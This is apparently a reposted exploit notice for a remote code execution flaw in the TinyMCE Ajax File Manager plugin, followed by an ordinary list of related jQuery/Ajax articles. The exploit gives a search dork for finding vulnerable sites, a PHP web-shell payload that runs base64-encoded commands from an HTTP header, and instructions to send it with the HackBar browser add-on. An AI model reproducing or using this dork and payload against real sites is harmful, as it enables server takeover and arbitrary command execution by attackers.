TinyMCE Ajax File Manager suffers from a remote code execution vulnerability.

简介: ____ ____ ____ _______/ |________ ____ ____ / _ \ / \_/ __ \ / ___/\ __\_ ...
 ____   ____   ____   _______/  |________   ____   ____ 
 /  _ \ /    \_/ __ \ /  ___/\   __\_  __ \_/ __ \_/ __ \
(  <_> )   |  \  ___/ \___ \  |  |  |  | \/\  ___/\  ___/
 \____/|___|  /\___  >____  > |_ |  |__|    \___  >\___  >
            \/     \/     \/                    \/     \/
      
 
# Exploit Title : timynce Ajax File Manager Remote Code 
# Author        : By onestree
# Software Link : http://www.phpletter.com/Demo/Tinymce-Ajax-File-Manager/
# tested        : windows 7
# Dork          : inurl:"/plugins/filemanager/" or inurl:'/timynce/plugins/"
 
 
*************************************************************
 
how to run the exploit use firefox web browser
and download firefox add ons HackBar

exploit : 

foo=<?php error_reporting(0);print(system('onestree'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>

 ====================================================================

tutorial video 
https://www.youtube.com/watch?v=ahli-dehYWY


Thanks :
 
  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
      
          indonesiancoder - moeslimh4x0r - go-coder
 
spesial my hunny ( Fheby Yahya) :* muaaah
目录
相关文章
|
PHP
php+ajax传file文件数据
php+ajax传file文件数据
110 0
|
前端开发
ajax 通过move_uploaded_file函数上传图片获取$_FILES['file']对象的属性内容
ajax 通过move_uploaded_file函数上传图片获取$_FILES['file']对象的属性内容
96 0
N..
|
XML JSON 前端开发
jQuery实现Ajax
jQuery实现Ajax
N..
135 1
|
XML 前端开发 JavaScript
jQuery中ajax如何使用
jQuery中ajax如何使用
187 0
|
JSON 前端开发 Java
利用Spring Boot处理JSON数据实战(包括jQuery,html,ajax)附源码 超详细
利用Spring Boot处理JSON数据实战(包括jQuery,html,ajax)附源码 超详细
387 0
|
敏捷开发 JavaScript 前端开发
❤❤❤【Vue.js最新版】sd.js基于jQuery Ajax最新原生完整版for凯哥API版本❤❤❤
❤❤❤【Vue.js最新版】sd.js基于jQuery Ajax最新原生完整版for凯哥API版本❤❤❤
|
前端开发 JavaScript
杨校老师课堂之基于Servlet整合JQuery中的Ajax进行表单提交[基于IDEA]
杨校老师课堂之基于Servlet整合JQuery中的Ajax进行表单提交[基于IDEA]
123 0
杨校老师课堂之基于Servlet整合JQuery中的Ajax进行表单提交[基于IDEA]
|
JavaScript 前端开发 安全
安全开发-JS应用&原生开发&JQuery库&Ajax技术&加密编码库&断点调试&逆向分析&元素属性操作
安全开发-JS应用&原生开发&JQuery库&Ajax技术&加密编码库&断点调试&逆向分析&元素属性操作
121 5
|
XML JSON 前端开发
AJAX是什么?原生语法格式?jQuery提供分装好的AJAX有什么区别?
AJAX是什么?原生语法格式?jQuery提供分装好的AJAX有什么区别?
102 0
|
JavaScript 前端开发
Ajax的使用(jquery的下载)
这篇文章是关于Ajax学习笔记的分享,包括JQuery的下载方式、Ajax的主要参数说明,以及如何在网页中使用Ajax进行异步请求的示例代码。